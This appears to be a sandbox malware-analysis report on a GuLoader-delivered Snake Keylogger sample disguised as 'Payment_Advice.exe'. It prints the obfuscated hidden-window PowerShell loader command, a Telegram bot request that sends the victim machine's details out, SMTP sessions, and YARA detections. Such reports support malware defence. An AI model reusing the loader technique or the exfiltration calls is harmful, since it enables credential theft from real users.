2024-07-25 08:19:32 UTC	708	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 24295 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=llI6X2N1GDT7jJHn%2FTD%2BXJz9KrlvgjsOjDvnEA5SCRTojtHzgE5lgETuNUIwro9aeXOxlzvlOT5xXR8TLypoAm003NYN2FIfRP5lA62CBn%2FbGgIZDfgHgLf0FZVILyiY8XMZf%2BNb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8ab9c13d106a59-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:19:32 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:19:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49723	188.114.97.3	443	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:19:36 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-25 08:19:36 UTC	706	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:36 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 24299 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3fAREJAHNyLn4HM%2FE2w1xrG6ZmU0q2ddjJEDCXcbeHrMnFpnZwbqCXrqilHw%2BuG4ODGtbMtrsYgQNl3TGz3%2FN4qr3GDyhLPV3Tk24TPT56KRr7T4ExKnL8JcZ6kMaU4CZEwtn47a"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8ab9d6ef48c431-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:19:36 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:19:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49725	188.114.97.3	443	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:19:37 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:19:37 UTC	706	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:37 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 24300 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ruCqajBFsdro5h4QaOZwBQj3ZddxBHOa0OjR6%2BUde8vvPEYjFdN28maJbjrU3g6Zj0SBw8nZJjH95vyi0HTDgq2XToAaWWvw%2FxBwXaKWuj4beGEH%2BFX962Hz8dprUzzqty0cx4gx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8ab9df1bf44366-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:19:37 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:19:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49728	188.114.97.3	443	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:19:41 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:19:41 UTC	716	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:41 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 24304 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fEaUsUXY%2BmbGr8WzM6%2BBjPIvtngX3cj9iMQuJn85UBaU0jHfkkoqRyIZeW%2BwUNVPedL%2FKgcVmrEKLgc3oAte6mv%2Bdhjxhn1bhDw0nv59mYUKxbfFoF8t%2FobfEX%2BmjWze%2BhyTH69D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8ab9f9ffc00f7b-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:19:41 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:19:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49730	149.154.167.220	443	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:19:45 UTC	334	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-07-25 08:19:45 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 08:19:45 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-25 08:19:45 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jul 25, 2024 10:19:52.726114035 CEST	587	49731	192.185.142.133	192.168.2.5	220-joyce.websitewelcome.com ESMTP Exim 4.96.2 #2 Thu, 25 Jul 2024 03:19:52 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 25, 2024 10:19:52.726321936 CEST	49731	587	192.168.2.5	192.185.142.133	EHLO 468325
Jul 25, 2024 10:19:52.842161894 CEST	587	49731	192.185.142.133	192.168.2.5	250-joyce.websitewelcome.com Hello 468325 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jul 25, 2024 10:19:52.842478037 CEST	49731	587	192.168.2.5	192.185.142.133	STARTTLS
Jul 25, 2024 10:19:53.166218996 CEST	587	49731	192.185.142.133	192.168.2.5	220 TLS go ahead
Jul 25, 2024 10:19:56.819963932 CEST	587	49732	192.185.142.133	192.168.2.5	220-joyce.websitewelcome.com ESMTP Exim 4.96.2 #2 Thu, 25 Jul 2024 03:19:56 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 25, 2024 10:19:56.820117950 CEST	49732	587	192.168.2.5	192.185.142.133	EHLO 468325
Jul 25, 2024 10:19:56.935118914 CEST	587	49732	192.185.142.133	192.168.2.5	250-joyce.websitewelcome.com Hello 468325 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jul 25, 2024 10:19:56.935375929 CEST	49732	587	192.168.2.5	192.185.142.133	STARTTLS
Jul 25, 2024 10:19:57.108762980 CEST	587	49732	192.185.142.133	192.168.2.5	220 TLS go ahead

Target ID:	0
Start time:	04:18:38
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\Payment_Advice.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Payment_Advice.exe"
Imagebase:	0x400000
File size:	867'992 bytes
MD5 hash:	0347F8C12B5BB537BDBECA759B4C67F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:18:40
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "
Imagebase:	0x730000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2439089411.0000000009D91000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:18:40
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:19:09
Start date:	25/07/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x90000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	20.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.1%
Total number of Nodes:	1283
Total number of Limit Nodes:	35

Executed Functions

Function 00403358 Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403377
SetErrorMode.KERNELBASE(00008001), ref: 00403382
OleInitialize.OLE32(00000000), ref: 00403389

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Payment_Advice.exe",00000000), ref: 004033D9
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Payment_Advice.exe",00000020), ref: 00403400
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
DeleteFileW.KERNELBASE(1033), ref: 0040356F
OleUninitialize.OLE32(?), ref: 0040361F
ExitProcess.KERNEL32 ref: 0040363F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp), ref: 0040364B
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Payment_Advice.exe",00000000,?), ref: 00403657
CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
DeleteFileW.KERNEL32(0041FE90,0041FE90,?,';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ",?), ref: 004036C4
CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036D8
CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
ExitProcess.KERNEL32 ref: 004037BA

Strings

';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ", xrefs: 00403688
\Temp, xrefs: 00403520
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 004034EE, 004035F1, 00403670, 0040367A
~nsu.tmp, xrefs: 00403645
Low, xrefs: 0040353C
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040336B
C:\Users\user\AppData\Local\Temp\, xrefs: 004034FE, 00403503, 00403519, 00403525, 00403534, 00403541, 0040354D, 00403555, 0040364A, 00403656, 00403662, 00403669, 0040371A
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas, xrefs: 004035FC
TEMP, xrefs: 0040354E
NSIS Error, xrefs: 004033B7
C:\Users\user\Desktop, xrefs: 00403650, 00403655, 00403679
Error launching installer, xrefs: 004035D6
TMP, xrefs: 00403556
"C:\Users\user\Desktop\Payment_Advice.exe", xrefs: 004033CC, 004033D2, 00403593
SeShutdownPrivilege, xrefs: 0040376D
1033, xrefs: 0040356A

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\Payment_Advice.exe"$';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-4187752809
Opcode ID: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
Opcode Fuzzy Hash: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405330
GetDlgItem.USER32(?,000003EE), ref: 0040533F
GetClientRect.USER32(?,?), ref: 0040537C
GetSystemMetrics.USER32(00000015), ref: 00405384
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
ShowWindow.USER32(?,00000008), ref: 00405420
GetDlgItem.USER32(?,000003EC), ref: 00405441
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
GetDlgItem.USER32(?,000003F8), ref: 0040534E

Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170

GetDlgItem.USER32(?,000003EC), ref: 00405493
CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054A8
ShowWindow.USER32(00000000), ref: 004054CC
ShowWindow.USER32(?,00000008), ref: 004054D1
ShowWindow.USER32(00000008), ref: 0040551B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
CreatePopupMenu.USER32 ref: 00405560
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
GetWindowRect.USER32(?,?), ref: 00405594
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
OpenClipboard.USER32(00000000), ref: 004055F5
EmptyClipboard.USER32 ref: 004055FB
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
GlobalLock.KERNEL32(00000000), ref: 00405611
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
GlobalUnlock.KERNEL32(00000000), ref: 00405645
SetClipboardData.USER32(0000000D,00000000), ref: 00405650
CloseClipboard.USER32 ref: 00405656

Strings

{, xrefs: 00405539

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: {
API String ID: 4154960007-366298937
Opcode ID: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
Opcode Fuzzy Hash: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

Function 00405F0A Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00405FCD
GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040604B
GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 0040605E
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 004060A8
CoTaskMemFree.OLE32(?), ref: 004060B3
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00406131

Strings

';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) ", xrefs: 00406104
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D1
: Completed, xrefs: 00405F34, 00406014, 00406035, 0040604A, 0040605D, 00406079, 004060A4, 004060D6, 004060DC, 004060F6, 0040610A, 0040612A, 00406130, 0040613C, 0040616F
Completed, xrefs: 00405F2F
